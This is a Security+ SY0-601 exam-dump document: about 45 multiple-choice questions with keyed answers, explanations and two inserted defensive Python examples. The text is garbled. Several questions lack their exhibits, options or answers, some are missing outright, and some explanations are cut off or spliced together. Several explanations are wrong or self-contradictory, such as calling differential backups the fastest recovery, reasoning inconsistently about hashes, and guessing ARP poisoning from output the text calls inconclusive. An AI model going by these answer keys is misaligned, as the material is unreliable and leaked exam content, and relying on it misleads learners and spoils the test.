SY0-601 - Dumpsbase 45
Exam : SY0-601
Version : V22.02
1 / 142
The safer , easier way to help you pass any IT exams.
1. During an incident, a company's CIRT determines it is necessary to observe the continued network-based transactions between a callback domain and the malware running on an enterprise PC.
Which of the following techniques would be BEST to enable this activity while reducing the risk of lateral spread and the risk that the adversary would notice any changes?
A. Physically move the PC to a separate internet point of presence.
B. Create and apply microsegmentation rules.
C. Emulate the malware in a heavily monitored DMZ segment.
D. Apply network blacklisting rules for the adversary domain.
Answer: C
Explanation:
To observe the continued network-based transactions between a callback domain and the malware
running on an enterprise PC while reducing the risk of lateral spread and the risk that the adversary
would notice any changes, the best technique to use is to emulate the malware in a heavily monitored
DMZ segment. This is a secure environment that is isolated from the rest of the network and can be
heavily monitored to detect any suspicious activity. By emulating the malware in this environment, the
activity can be observed without the risk of lateral spread or detection by the adversary. References:
https://www.sans.org/blog/incident-response-fundamentals-why-is-the-dmz-so-important/
2.A desktop support technician recently installed a new document-scanning software program on a
computer. However, when the end user tried to launch the program, it did not respond.
Which of the following is MOST likely the cause?
A. A new firewall rule is needed to access the application.
B. The system was quarantined for missing software updates.
C. The software was not added to the application whitelist.
D. The system was isolated from the network due to infected software.
Answer: C
Explanation:
The most likely cause of the document-scanning software program not responding when launched by the
end user is that the software was not added to the application whitelist. An application whitelist is a list of
approved software applications that are allowed to run on a system. If the software is not on the whitelist,
it may be blocked from running by the system's security policies. Adding the software to the whitelist
should resolve the issue and allow the program to run.
References: https://www.techopedia.com/definition/31541/application-whitelisting
3. A cybersecurity administrator needs to allow mobile BYOD devices to access network resources. As the devices are not enrolled in the domain and do not have policies applied to them, which of the following are best practices for authentication and infrastructure security? (Select TWO).
A. Create a new network for the mobile devices and block the communication to the internal network and
servers
B. Use a captive portal for user authentication.
C. Authenticate users using OAuth for more resiliency
D. Implement SSO and allow communication to the internal network
E. Use the existing network and allow communication to the internal network and servers.
F. Use a new and updated RADIUS server to maintain the best solution
Answer: B,C
Explanation:
When allowing mobile BYOD devices to access network resources, using a captive portal for user
authentication and authenticating users using OAuth are both best practices for authentication and
infrastructure security. A captive portal requires users to authenticate before accessing the network and
can be used to enforce policies and restrictions. OAuth allows users to authenticate using third-party
providers, reducing the risk of password reuse and credential theft. References: CompTIA Security+
Study Guide, pages 217-218, 225-226
4.A major clothing company recently lost a large amount of proprietary information. The security officer
must find a solution to ensure this never happens again.
Which of the following is the BEST technical implementation to prevent this from happening again?
A. Configure DLP solutions
B. Disable peer-to-peer sharing
C. Enable role-based
D. Mandate job rotation
E. Implement content filters
Answer: A
Explanation:
Data loss prevention (DLP) solutions can prevent the accidental or intentional loss of sensitive data. DLP
tools can identify and protect sensitive data by classifying and categorizing it, encrypting it, or blocking it
from being transferred outside the organization's network.
5.Which of the following controls would provide the BEST protection against tailgating?
A. Access control vestibule
B. Closed-circuit television
C. Proximity card reader
D. Faraday cage
Answer: A
Explanation:
Access control vestibules, also known as mantraps or airlocks, are physical security features that require
individuals to pass through two or more doors to enter a secure area.
They are effective at preventing tailgating, as only one person can pass through each door at a time.
References:
✑ https://www.comptia.org/content/guides/what-is-a-mantrap
✑ CompTIA Security+ Study Guide, Sixth Edition (SY0-601), page 222
6.An organization would like to remediate the risk associated with its cloud service provider not meeting
its advertised 99.999% availability metrics.
Which of the following should the organization consult for the exact requirements for the cloud provider?
A. SLA
B. BPA
C. NDA
D. MOU
Answer: A
Explanation:
The Service Level Agreement (SLA) is a contract between the cloud service provider and the
organization that stipulates the exact requirements for the cloud provider. It outlines the level of service
that the provider must deliver, including the minimum uptime percentage, support response times, and
the remedies and penalties for failing to meet the agreed-upon service levels.
7. An enterprise has hired an outside security firm to facilitate penetration testing on its network and applications. The firm has agreed to pay for each vulnerability that is discovered.
Which of the following BEST represents the type of testing that is being used?
A. White-box
B. Red-team
C. Bug bounty
D. Gray-box
E. Black-box
Answer: C
Explanation:
Bug bounty is a type of testing in which an organization offers a reward or compensation to anyone who
can identify vulnerabilities or security flaws in their network or applications. The outside security firm has
agreed to pay for each vulnerability found, which is an example of a bug bounty program.
8. A network analyst is investigating compromised corporate information. The analyst is led to a theory that network traffic was intercepted before being transmitted to the internet.
The following output was captured on an internal host:
Based on the IoCs, which of the following was the MOST likely attack used to compromise the network communication?
A. Denial of service
B. ARP poisoning
C. Command injection
D. MAC flooding
Answer: B
Explanation:
ARP poisoning (also known as ARP spoofing) is a type of attack where an attacker sends falsified ARP
messages over a local area network to link the attacker's MAC address with the IP address of another
host on the network. References: CompTIA Security+ Certification Exam Objectives - 2.5 Given a
scenario, analyze potential indicators to determine the type of attack. Study Guide: Chapter 6, page 271.
9. A security engineer needs to build a solution to satisfy regulatory requirements that state certain
critical servers must be accessed using MFA. However, the critical servers are older and are unable to support the addition of MFA.
Which of the following will the engineer MOST likely use to achieve this objective?
A. A forward proxy
B. A stateful firewall
C. A jump server
D. A port tap
Answer: C
Explanation:
A jump server is a secure host that allows users to access other servers within a network. The jump
server acts as an intermediary, and users can access other servers via the jump server after
authenticating with MFA.
10.As part of the building process for a web application, the compliance team requires that all PKI
certificates are rotated annually and can only contain wildcards at the secondary subdomain level.
Which of the following certificate properties will meet these requirements?
A. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
B. HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021-April 8 12:00:00 2022
C. HTTPS:// app1.comptia.org, Valid from April 10 00:00:00 2021-April 8 12:00:00 2022
D. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00
Answer: A
Explanation:
PKI certificates are digital certificates that use public key infrastructure (PKI) to verify the identity and authenticity of a sender and a receiver of data. PKI certificates can be used to secure web applications with HTTPS, which is a protocol that encrypts and protects the data transmitted over the internet.
One of the properties of PKI certificates is the domain name, which is the name of the website or web application that the certificate is issued for. The domain name can be either a specific name, such as app1.comptia.org, or a wildcard name, such as *.comptia.org. A wildcard name means that the certificate can be used with multiple subdomains of a domain, such as payment.comptia.org or contact.comptia.org.
Another property of PKI certificates is the validity period, which is the time span during which the certificate is valid and can be used. The validity period is determined by the certificate authority (CA) that issues the certificate, and it usually ranges from one to three years. The validity period can be checked by looking at the valid from and valid to dates on the certificate.
Based on these properties, the certificate that will meet the requirements of rotating annually and only containing wildcards at the secondary subdomain level is A. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022. This certificate has a wildcard character (*) at the secondary subdomain level, which means it can be used with any subdomain of comptia.org. It also has a validity period of one year, which means it needs to be rotated annually.
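To show how the two properties in the explanation above can be checked mechanically, here is an added example (not part of the original question bank) that parses the four option strings as written, following the explanation's reading that *.comptia.org is the secondary subdomain level and treating the requirement as calling for a wildcard certificate. It assumes the wildcard asterisk that extraction dropped from options A and D, and it goes beyond the four options by also rejecting wildcards placed deeper than the secondary level or inside a label.

```python
from datetime import datetime, timedelta

# The four certificate descriptions from question 10, embedded as constructed input.
# The asterisk in A and D is assumed (the explanation quotes A as *.comptia.org).
OPTIONS = {
    "A": "HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022",
    "B": "HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021-April 8 12:00:00 2022",
    "C": "HTTPS:// app1.comptia.org, Valid from April 10 00:00:00 2021-April 8 12:00:00 2022",
    "D": "HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00",
}

DATE_FMT = "%B %d %H:%M:%S %Y"       # e.g. "April 10 00:00:00 2021"
MAX_LIFETIME = timedelta(days=366)   # annual rotation, allowing for a leap year


def parse_option(text):
    """Split 'HTTPS://<name>, Valid from <start> - <end>' into (name, start, end).

    Raises ValueError/IndexError when a part is missing or a date is malformed
    (option D has no year on its end date).
    """
    name_part, _, validity = text.partition(", Valid from ")
    name = name_part.split("://", 1)[1].strip().lower()
    # The date format contains no hyphens, so the first "-" separates start from end.
    start_s, _, end_s = validity.partition("-")
    start = datetime.strptime(start_s.strip(), DATE_FMT)
    end = datetime.strptime(end_s.strip(), DATE_FMT)
    return name, start, end


def wildcard_at_secondary_level(name):
    """True only for '*.<domain>.<tld>': the wildcard is the entire leftmost label and
    sits directly beneath the registered domain (the explanation's reading of
    "secondary subdomain level")."""
    labels = name.split(".")
    return (
        len(labels) == 3
        and labels[0] == "*"
        and all(label and "*" not in label for label in labels[1:])
    )


def check_certificate(text):
    """Return (compliant, reason) for one certificate description."""
    try:
        name, start, end = parse_option(text)
    except (ValueError, IndexError):
        return False, "name or validity period could not be parsed"
    if "*" not in name:
        return False, "no wildcard, but the requirement calls for a wildcard certificate"
    if not wildcard_at_secondary_level(name):
        return False, "wildcard is not at the secondary subdomain level"
    lifetime = end - start
    if lifetime <= timedelta(0) or lifetime > MAX_LIFETIME:
        return False, f"lifetime of {lifetime.days} days does not match annual rotation"
    return True, f"wildcard {name}, lifetime {lifetime.days} days"


def compliant_options(options=OPTIONS):
    """Letters of the options that satisfy both requirements, in order."""
    return sorted(letter for letter, text in options.items() if check_certificate(text)[0])


if __name__ == "__main__":
    for letter, text in OPTIONS.items():
        ok, reason = check_certificate(text)
        print(f"{letter}: {'PASS' if ok else 'FAIL'} - {reason}")
    print("compliant:", compliant_options())   # ['A']
```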
11.A software company is analyzing a process that detects software vulnerabilities at the earliest stage
possible. The goal is to scan the source looking for unsecure practices and weaknesses before the
application is deployed in a runtime environment.
Which of the following would BEST assist the company with this objective?
12. A security analyst is investigating multiple hosts that are communicating to external IP addresses during the hours of 2:00 a.m. - 4:00 a.m. The malware has evaded detection by traditional antivirus software.
Which of the following types of malware is MOST likely infecting the hosts?
A. A RAT
B. Ransomware
C. Polymorphic
D. A worm
Answer: A
Explanation:
Based on the given information, the most likely type of malware infecting the hosts is a RAT (Remote
Access Trojan). RATs are often used for stealthy unauthorized access to a victim's computer, and they
can evade traditional antivirus software through various sophisticated techniques. In particular, the fact
that the malware is communicating with external IP addresses during specific hours suggests that it may
be under the control of an attacker who is issuing commands from a remote location. Ransomware,
polymorphic malware, and worms are also possible culprits, but the context of the question suggests that
a RAT is the most likely answer.
13. A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users' PCs.
Which of the following is the most likely cause of this issue?
A. TFTP was disabled on the local hosts
B. SSH was turned off instead of modifying the configuration file
C. Remote login was disabled in the networkd.config instead of using the sshd.conf
D. Network services are no longer running on the NAS
Answer: B
Explanation:
SSH stands for Secure Shell Protocol, which is a cryptographic network protocol that allows secure remote login and command execution on a network device. SSH can encrypt both the authentication information and the data being exchanged between the client and the server. SSH can be used to
14. A company has discovered that unauthorized devices are using its WiFi network, and it wants to harden the access point to improve security.
Which of the following configurations should an analyst enable to improve security? (Select TWO.)
A. RADIUS
B. PEAP
C. WPS
D. WEP-EKIP
E. SSL
F. WPA2-PSK
Answer: A,F
Explanation:
To improve the security of the WiFi network and prevent unauthorized devices from accessing the
network, the configuration options of RADIUS and WPA2-PSK should be enabled. RADIUS (Remote
Authentication Dial-In User Service) is an authentication protocol that can be used to control access to
the WiFi network. It can provide stronger authentication and authorization than WEP and WPA. WPA2-
PSK (WiFi Protected Access 2 with Pre-Shared Key) is a security protocol that uses stronger encryption
than WEP and WPA. It requires a pre-shared key (PSK) to be entered on each device that wants to
access the network. This helps prevent unauthorized devices from accessing the network.
15.Which of the following identifies the point in time when an organization will recover data in the event
of an outage?
A. SLA
B. RPO
C. MTBF
D. ARO
Answer: B
Explanation:
Recovery Point Objective (RPO) is the maximum duration of time that an organization can tolerate data
loss in the event of an outage. It identifies the point in time when data recovery must begin, and any data
loss beyond that point is considered unacceptable.
Reference: CompTIA Security+ Certification Guide, Exam SY0-601 by Mike Chapple and
David Seidl, Chapter-7: Incident Response and Recovery, Objective 7.2: Compare and
contrast business continuity and disaster recovery concepts, pp. 349-350.
16. An attacker replaces a digitally signed document with another version that goes unnoticed. Upon reviewing the document's contents, the author notices some additional verbiage that was not originally in the document but cannot validate an integrity issue.
Which of the following attacks was used?
A. Cryptomalware
B. Hash substitution
C. Collision
D. Phishing
Answer: B
Explanation:
This type of attack occurs when an attacker replaces a digitally signed document with another version
that has a different hash value. The author would be able to notice the additional verbiage, however,
since the hash value would have changed, they would not be able to validate an integrity issue.
17. A company recently experienced a major breach. An investigation concludes that customer credit card data was stolen and exfiltrated through a dedicated business partner connection to a vendor, who is not held to the same security control standards.
Which of the following is the MOST likely source of the breach?
A. Side channel
B. Supply chain
C. Cryptographic downgrade
D. Malware
Answer: B
Explanation:
A supply chain attack occurs when a third-party supplier or business partner is compromised, leading to
an attacker gaining unauthorized access to the targeted organization's network. In this scenario, the
dedicated business partner connection to a vendor was used to exfiltrate customer credit card data,
indicating that the vendor's network was breached and used as a supply chain attack vector.
18. Employees at a company are receiving unsolicited text messages on their corporate cell phones. The unsolicited text messages contain a password reset link.
Which of the following attacks is being used to target the company?
A. Phishing
B. Vishing
C. Smishing
D. Spam
Answer: C
Explanation:
Smishing is a type of phishing attack which begins with an attacker sending a text message to an
individual. The message contains social engineering tactics to convince the person to click on a
malicious link or send sensitive information to the attacker.
Criminals use smishing attacks for purposes like:
✑ Learning login credentials to accounts via credential phishing
✑ Discovering private data like social security numbers
✑ Having the victim send money to the attacker
✑ Installing malware on a phone
✑ Establishing trust before using other forms of contact like phone calls or emails
Attackers may pose as trusted sources like a government organization, a person you know, or your
bank. And messages often come with manufactured urgency and time-sensitive threats. This can make it
more difficult for a victim to notice a scam.
Phone numbers are easy to spoof with VoIP texting, where users can create a virtual number to send
and receive texts. If a certain phone number is flagged for spam, criminals can simply recycle it and use
a new one.
20. A security engineer is reviewing the logs from a SAML application that is configured to use MFA. During this review, the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed without a VPN, has a policy that allows time-based tokens to be generated. Users who changed locations should be required to reauthenticate but have not been.
Which of the following statements BEST explains the issue?
A. OpenID is mandatory to make the MFA requirements work
B. An incorrect browser has been detected by the SAML application
C. The access device has a trusted certificate installed that is overwriting the session token
D. The user's IP address is changing between logins, but the application is not invalidating the token
Answer: D
appliance. References: CompTIA Security+ Certification Exam Objectives, Exam Domain 2.0:
Technologies and Tools, 2.4 Given a scenario, use appropriate tools and techniques to troubleshoot
security issues, p. 21
22.The security team received a report of copyright infringement from the IP space of the corporate
network. The report provided a precise time stamp for the incident as well as the name of the
copyrighted files. The analyst has been tasked with determining the infringing source machine and
instructed to implement measures to prevent such incidents from occurring again.
Which of the following is MOST capable of accomplishing both tasks?
A. HIDS
B. Allow list
C. TPM
D. NGFW
Answer: D
Explanation:
Next-Generation Firewalls (NGFWs) are designed to provide advanced threat protection by combining
traditional firewall capabilities with intrusion prevention, application control, and other security features.
NGFWs can detect and block unauthorized access attempts, malware infections, and other suspicious
activity. They can also be used to monitor file access and detect unauthorized copying or distribution of
copyrighted material.
A next-generation firewall (NGFW) can be used to detect and prevent copyright infringement by
analyzing network traffic and blocking unauthorized transfers of copyrighted material. Additionally,
NGFWs can be configured to enforce access control policies that prevent unauthorized access to
sensitive resources. References:
✑ CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 6
23.During a forensic investigation, a security analyst discovered that the following command was run on
a compromised host:
24.Which of the following BEST describes the team that acts as a referee during a penetration-testing
exercise?
A. White team
B. Purple team
C. Green team
D. Blue team
E. Red team
Answer: A
Explanation:
During a penetration testing exercise, the white team is responsible for acting as a referee and providing
oversight and support to ensure that the testing is conducted safely and effectively. They may also be
responsible for determining the rules and guidelines of the exercise, monitoring the progress of the
teams, and providing feedback and insights on the strengths and weaknesses of the organization's
security measures.
25.A systems administrator is considering different backup solutions for the IT infrastructure. The
company is looking for a solution that offers the fastest recovery time while also saving the most amount
of storage used to maintain the backups.
Which of the following recovery solutions would be the BEST option to meet these requirements?
A. Snapshot
B. Differential
C. Full
D. Tape
Answer: B
Explanation:
Differential backup is a type of backup that backs up all data that has changed since the last full backup.
This backup method offers faster recovery than a full backup, as it only needs to restore the full backup
and the differential backup, reducing the amount of data that needs to be restored. It also uses less
storage than a full backup as it only stores the changes made from the last full backup.
26. A company is planning to install a guest wireless network so visitors will be able to access the Internet. The stakeholders want the network to be easy to connect to so time is not wasted during meetings. The WAPs are configured so that power levels and antennas cover only the conference rooms where visitors will attend meetings.
Which of the following would BEST protect the company's internal wireless network against visitors accessing company resources?
A. Configure the guest wireless network to be on a separate VLAN from the company's internal wireless
network
B. Change the password for the guest wireless network every month.
C. Decrease the power levels of the access points for the guest wireless network.
D. Enable WPA2 using 802.1X for logging on to the guest wireless network.
Answer: A
Explanation:
Configuring the guest wireless network on a separate VLAN from the company's internal wireless
network will prevent visitors from accessing company resources.
References: CompTIA Security+ Study Guide: Exam SY0-601, Chapter 4
27. An employee receives an email stating he won the lottery. The email includes a link that requests a name, mobile phone number, address, and date of birth be provided to confirm the employee's identity
28.Which of the following function as preventive, detective, and deterrent controls to reduce the risk of
physical theft? (Select TWO).
A. Mantraps
B. Security guards
C. Video surveillance
D. Fences
E. Bollards
F. Antivirus
Answer: A,B
Explanation:
A - A mantrap can trap personnel with bad intentions (preventive), which is much the same as detecting them, since you will know if someone is trapped there (detective), and it can deter such personnel from approaching as well (deterrent).
B - Security guards can do the same: they prevent malicious personnel from entering (preventive + deterrent) and notice such personnel as well (detective).
29.Which of the following uses six initial steps that provide basic control over system security by
including hardware and software inventory, vulnerability management, and continuous monitoring to
minimize risk in all network environments?
A. ISO 27701
B. The Center for Internet Security
C. SSAE SOC 2
D. NIST Risk Management Framework
Answer: B
Explanation:
The Center for Internet Security (CIS) uses six initial steps that provide basic control over system
security, including hardware and software inventory, vulnerability management, and continuous
monitoring to minimize risk in all network environments.
References:
✑ CompTIA Security+ Certification Exam Objectives 1.1: Compare and contrast different types of
security concepts.
✑ CompTIA Security+ Study Guide, Sixth Edition, pages 15-16
30.A backdoor was detected on the containerized application environment. The investigation detected
that a zero-day vulnerability was introduced when the latest container image version was downloaded
from a public registry.
Which of the following is the BEST solution to prevent this type of incident from occurring again?
A. Enforce the use of a controlled trusted source of container images
B. Deploy an IPS solution capable of detecting signatures of attacks targeting containers
C. Define a vulnerability scan to assess container images before they are introduced into the environment
D. Create a dedicated VPC for the containerized environment
Answer: A
Explanation:
Enforcing the use of a controlled trusted source of container images is the best solution to prevent
incidents like the introduction of a zero-day vulnerability through container images from occurring again.
References: CompTIA Security+ Study Guide by Emmett Dulaney, Chapter 11: Cloud Security, Container
Security
31. An employee's company account was used in a data breach. Interviews with the employee revealed:
• The employee was able to avoid changing passwords by using a previous password again.
• The account was accessed from a hostile, foreign nation, but the employee has never traveled to any other countries.
Which of the following can be implemented to prevent these issues from recurring? (Select TWO)
A. Geographic dispersal
B. Password complexity
C. Password history
D. Geotagging
E. Password lockout
F. Geofencing
Answer: C,F
Explanation:
Two possible solutions that can be implemented to prevent these issues from recurring are password history and geofencing. Password history is a feature that prevents users from reusing their previous passwords. This can enhance password security by forcing users to create new and unique passwords periodically. Password history can be configured by setting a policy that specifies how many previous passwords are remembered and how often users must change their passwords.
Geofencing is a feature that restricts access to a system or network based on the geographic location of the user or device. This can enhance security by preventing unauthorized access from hostile or foreign regions. Geofencing can be implemented by using GPS, IP address, or other methods to determine the location of the user or device and compare it with a predefined set of boundaries.
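An added example (not from the study guide or any vendor product) showing how the two controls from question 31 fit together in one login flow: a password-history check that re-hashes the candidate under each remembered salt, and an IP-based geofence that maps the source address to a country through a constructed lookup table. HISTORY_DEPTH, ALLOWED_COUNTRIES, the IP ranges and the country codes are assumed values chosen for the example.

```python
import hashlib
import hmac
import ipaddress
import os

HISTORY_DEPTH = 5            # previous password hashes remembered (assumed policy value)
ALLOWED_COUNTRIES = {"US"}   # geofence: countries this workforce may log in from (assumed)

# Constructed IP-to-country table standing in for a GeoIP database. The ranges are
# RFC 5737 documentation networks and the country codes are chosen for this example.
GEO_TABLE = {
    ipaddress.ip_network("203.0.113.0/24"): "US",
    ipaddress.ip_network("198.51.100.0/24"): "ZZ",   # placeholder for a blocked region
}


def hash_password(password, salt):
    """Salted PBKDF2-HMAC-SHA256; the iteration count is kept low for a quick demo."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 50_000)


class Account:
    """A user record that keeps the last HISTORY_DEPTH (salt, hash) pairs, newest last."""

    def __init__(self, username, initial_password):
        self.username = username
        self.history = []
        self._store(initial_password)

    def _store(self, password):
        salt = os.urandom(16)
        self.history.append((salt, hash_password(password, salt)))
        self.history = self.history[-HISTORY_DEPTH:]   # forget the oldest entries

    def matches_current(self, password):
        salt, digest = self.history[-1]
        return hmac.compare_digest(hash_password(password, salt), digest)

    def change_password(self, new_password):
        """Password history: the candidate is re-hashed under every remembered salt,
        so reusing any of the last HISTORY_DEPTH passwords is refused."""
        for salt, digest in self.history:
            if hmac.compare_digest(hash_password(new_password, salt), digest):
                return False
        self._store(new_password)
        return True


def country_for(ip):
    """Look the source address up in the constructed table; None if unknown."""
    addr = ipaddress.ip_address(ip)
    for network, country in GEO_TABLE.items():
        if addr in network:
            return country
    return None


def geofence_allows(ip):
    # Unknown locations are denied as well: a geofence that fails open is no control.
    return country_for(ip) in ALLOWED_COUNTRIES


def evaluate_login(account, password, source_ip):
    """Apply the geofence before the credential check, so a stolen password presented
    from outside the fence never reaches password verification."""
    if not geofence_allows(source_ip):
        return "denied: outside geofence"
    if not account.matches_current(password):
        return "denied: bad credentials"
    return "allowed"


if __name__ == "__main__":
    acct = Account("jdoe", "Winter2023!")
    print("reuse same password:", acct.change_password("Winter2023!"))   # False
    print("new password:", acct.change_password("Spring2024!"))          # True
    print("login from allowed range:", evaluate_login(acct, "Spring2024!", "203.0.113.7"))
    print("login from blocked range:", evaluate_login(acct, "Spring2024!", "198.51.100.9"))
```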
32.A security administrator wants to implement a program that tests a user's ability to recognize attacks
over the organization's email system.
Which of the following would be BEST suited for this task?
A. Social media analysis
B. Annual information security training
C. Gamification
D. Phishing campaign
Answer: D
Explanation:
A phishing campaign is a simulated attack that tests a user's ability to recognize attacks over the
organization's email system. Phishing campaigns can be used to train users on how to identify and
report suspicious emails.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 2:
Technologies and Tools, pp. 85-86.
33.Which of the following involves the inclusion of code in the main codebase as soon as it is written?
A. Continuous monitoring
B. Continuous deployment
C. Continuous Validation
D. Continuous integration
Answer: D
Explanation:
Continuous Integration (CI) is a practice where developers integrate code into a shared repository
frequently, preferably several times a day. Each integration is verified by an automated build and
automated tests. CI allows for the detection of errors early in the development cycle, thereby reducing
overall development costs.
34. While reviewing pcap data, a network security analyst is able to locate plaintext usernames and passwords being sent from workstations to network switches.
Which of the following is the security analyst MOST likely observing?
A. SNMP traps
B. A Telnet session
C. An SSH connection
D. SFTP traffic
Answer: B
Explanation:
The security analyst is likely observing a Telnet session, as Telnet transmits data in plain text format,
including usernames and passwords.
Reference: CompTIA Security+ Certification Exam Objectives, Exam SY0-601, 1.2 Given a scenario,
analyze indicators of compromise and determine the type of malware.
35.A company is required to continue using legacy software to support a critical service.
Which of the following BEST explains a risk of this practice?
36. After gaining access to a dual-homed (i.e., wired and wireless) multifunction device by exploiting a
vulnerability in the device's firmware, a penetration tester then gains shell access on another networked
asset.
This technique is an example of:
A. privilege escalation
B. footprinting
C. persistence
D. pivoting
Answer: D
Explanation:
The technique of gaining access to a dual-homed multifunction device and then gaining shell access on
another networked asset is an example of pivoting. References: CompTIA Security+ Study Guide by
Emmett Dulaney, Chapter 8: Application, Data, and Host Security, Enumeration and Penetration Testing
37.Per company security policy, IT staff members are required to have separate credentials to perform
administrative functions using just-in-time permissions.
Which of the following solutions is the company implementing?
A. Privileged access management
B. SSO
C. RADIUS
D. Attribute-based access control
Answer: A
Explanation:
The company is implementing privileged access management, which provides just-in-time permissions
for administrative functions.
38. Which of the following environments utilizes dummy data and is MOST likely to be installed locally on a system that allows it to be assessed directly and modified easily with each build?
A. Production
B. Test
C. Staging
D. Development
Answer: D
Explanation:
The environment that utilizes dummy data and is most likely to be installed locally on a system that
allows it to be assessed directly and modified easily with each build is the development environment.
The development environment is used for developing and testing software and applications. It is typically
installed on a local system, rather than on a remote server, to allow for easy access and modification.
Dummy data can be used in the development environment to simulate real-world scenarios and test the
software's functionality.
References: https://www.techopedia.com/definition/27561/development-environment
39.A security researcher is using an adversary's infrastructure and TTPs and creating a named group to
track those targeted.
Which of the following is the researcher MOST likely using?
A. The Cyber Kill Chain
B. The incident response process
C. The Diamond Model of Intrusion Analysis
D. MITRE ATT&CK
Answer: D
Explanation:
The researcher is most likely using the MITRE ATT&CK framework. MITRE ATT&CK is a globally
accessible knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world
observations. It helps security teams better understand and track adversaries by creating a named
group, which aligns with the scenario described in the question. The framework is widely recognized and
referenced in the cybersecurity industry, including in CompTIA Security+ study materials.
References: 1. CompTIA Security+ Certification Exam Objectives (SY0-601):
https://www.comptia.jp/pdf/Security%2B%20SY0-601%20Exam%20Objectives.pdf 2. MITRE ATT&CK:
https://attack.mitre.org/
MITRE ATT&CK is a knowledge base of adversary tactics, techniques, and procedures (TTPs) that are
observed in real-world cyberattacks. MITRE ATT&CK provides a common framework and language for
describing and analyzing cyber threats and their behaviors.
MITRE ATT&CK also allows security researchers to create named groups that track specific adversaries
based on their TTPs.
The other options are not correct because:
✑ A. The Cyber Kill Chain is a model that describes the stages of a cyberattack from reconnaissance to
exfiltration. The Cyber Kill Chain does not provide a way to create named groups based on adversary
TTPs.
✑ B. The incident response process is a set of procedures and guidelines that defines how an
organization should respond to a security incident. The incident response process does not provide a
way to create named groups based on adversary TTPs.
✑ C. The Diamond Model of Intrusion Analysis is a framework that describes the four core features of
any intrusion: adversary, capability, infrastructure, and victim. The Diamond Model of Intrusion Analysis
does not provide a way to create named groups based on adversary TTPs.
According to CompTIA Security+ SY0-601 Exam Objectives 1.1 Compare and contrast different types of
40.A security analyst was deploying a new website and found a connection attempting to authenticate on
the site's portal. While investigating the incident, the analyst identified the following input in the
username field:
41.A new vulnerability in the SMB protocol on the Windows systems was recently discovered, but no
patches are currently available to resolve the issue. The security administrator is concerned if servers in
the company's DMZ will be vulnerable to external attack; however, the administrator cannot disable the
service on the servers, as SMB is used by a number of internal systems and applications on the LAN.
Which of the following TCP ports should be blocked for all external inbound connections to the DMZ as a
workaround to protect the servers? (Select TWO).
A. 135
B. 139
C. 143
D. 161
E. 443
F. 445
Answer: B,F
Explanation:
To protect the servers in the company’s DMZ from external attack due to the new vulnerability in the
SMB protocol on the Windows systems, the security administrator should block TCP ports 139 and 445
for all external inbound connections to the DMZ. SMB uses TCP ports 139 and 445. Blocking these ports
will prevent external attackers from exploiting the vulnerability in SMB protocol on Windows systems.
Blocking TCP ports 139 and 445 for all external inbound connections to the DMZ can help protect the
servers, as these ports are used by SMB protocol. Port 135 is also associated with SMB, but it is not
commonly used. Ports 143 and 161 are associated with other protocols and services.
Reference: CompTIA Security+ Certification Exam Objectives, Exam SY0-601, 1.4 Compare and
contrast network architecture and technologies.
42.The technology department at a large global company is expanding its Wi-Fi network infrastructure at
the headquarters building.
Which of the following should be closely coordinated between the technology, cybersecurity, and
physical security departments?
A. Authentication protocol
B. Encryption type
C. WAP placement
D. VPN configuration
Answer: C
Explanation:
WAP stands for wireless access point, which is a device that allows wireless devices to connect to a
wired network using Wi-Fi or Bluetooth. WAP placement refers to where and how WAPs are installed in a
building or area.
WAP placement should be closely coordinated between the technology, cybersecurity, and physical
security departments because it affects several aspects of network performance and security, such as:
✑ Coverage: WAP placement determines how well wireless devices can access the network throughout
the building or area. WAPs should be placed in locations that provide optimal signal strength and avoid
interference from other sources.
✑ Capacity: WAP placement determines how many wireless devices can connect to the network
simultaneously without affecting network speed or quality. WAPs should be placed in locations that
balance network load and avoid congestion or bottlenecks.
✑ Security: WAP placement determines how vulnerable wireless devices are to eavesdropping or
hacking attacks from outside or inside sources. WAPs should be placed in locations that minimize
exposure to unauthorized access and maximize encryption and authentication methods.
43.Which of the technologies is used to actively monitor for specific file types being transmitted on the
network?
A. File integrity monitoring
B. Honeynets
C. Tcpreplay
D. Data loss prevention
Answer: D
Explanation:
Data loss prevention (DLP) is a technology used to actively monitor for specific file types being
transmitted on the network. DLP solutions can prevent the unauthorized transfer of sensitive information,
such as credit card numbers and social security numbers, by monitoring data in motion.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 2:
Technologies and Tools, pp. 99-102.
44.A security analyst has received several reports of an issue on an internal web application. Users state
they are having to provide their credentials twice to log in. The analyst checks with the application team
and notes this is not an expected behavior.
After looking at several logs, the analyst decides to run some commands on the gateway and obtains the
following output:
Which of the following BEST describes the attack the company is experiencing?
A. MAC flooding
B. URL redirection
C. ARP poisoning
D. DNS hijacking
Answer: C
Explanation:
The output of the “netstat -ano” command shows that there are two connections to the same IP address
and port number. This indicates that there are two active sessions between the client and server.
The issue of users having to provide their credentials twice to log in is known as a double login prompt
issue. This issue can occur due to various reasons such as incorrect configuration of authentication
settings, incorrect configuration of web server settings, or issues with the client’s browser.
Based on the output of the “netstat -ano” command alone, it is difficult to determine the exact cause of
the issue. However, it is possible that an attacker is intercepting traffic between the client and server and
stealing user credentials. This type of attack is known as ARP poisoning (option C).
ARP poisoning is a type of attack where an attacker sends fake ARP messages to associate their MAC
address with the IP address of another device on the network. This allows them to intercept traffic
between the two devices and steal sensitive information such as user credentials.
45.An organization is moving away from the use of client-side and server-side certificates for EAP. The
company would like the new EAP solution to have the ability to detect rogue access points.
Which of the following would accomplish these requirements?
A. PEAP
B. EAP-FAST
C. EAP-TLS
D. EAP-TTLS
Answer: B
Explanation:
